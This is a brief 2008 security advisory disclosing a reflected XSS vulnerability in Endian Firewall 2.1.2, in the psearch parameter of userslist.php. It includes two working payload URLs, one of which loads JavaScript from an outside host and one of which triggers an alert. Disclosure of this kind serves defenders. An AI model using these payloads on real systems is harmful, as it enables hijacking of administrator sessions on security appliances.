#Security Advisory - Multiple Vulnerabilities in Endian Firewall#

Endian Firewall is a "turn-key" Linux security distribution that turns every system into a full-featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module.

Date            : 01-28-2008
Product         : Endian Firewall
Version         : 2.1.2 - Prior versions may also be affected
Vendor          : http://www.endian.com/en/
Author          : syniack
Contact         : syniack@gmail.com
S.Page          : http://bsecure.net.pk

XSS Vulnerability: [TESTED]

Security issue in the following file:

vpnum/userslist.php?psearch=xss

Example:

http://www.example.com/vpnum/userslist.php?psearch="><script src=http://www.example2.com/re.js></script>

http://www.example.com/vpnum/userslist.php?psearch="><script>alert(1);</script>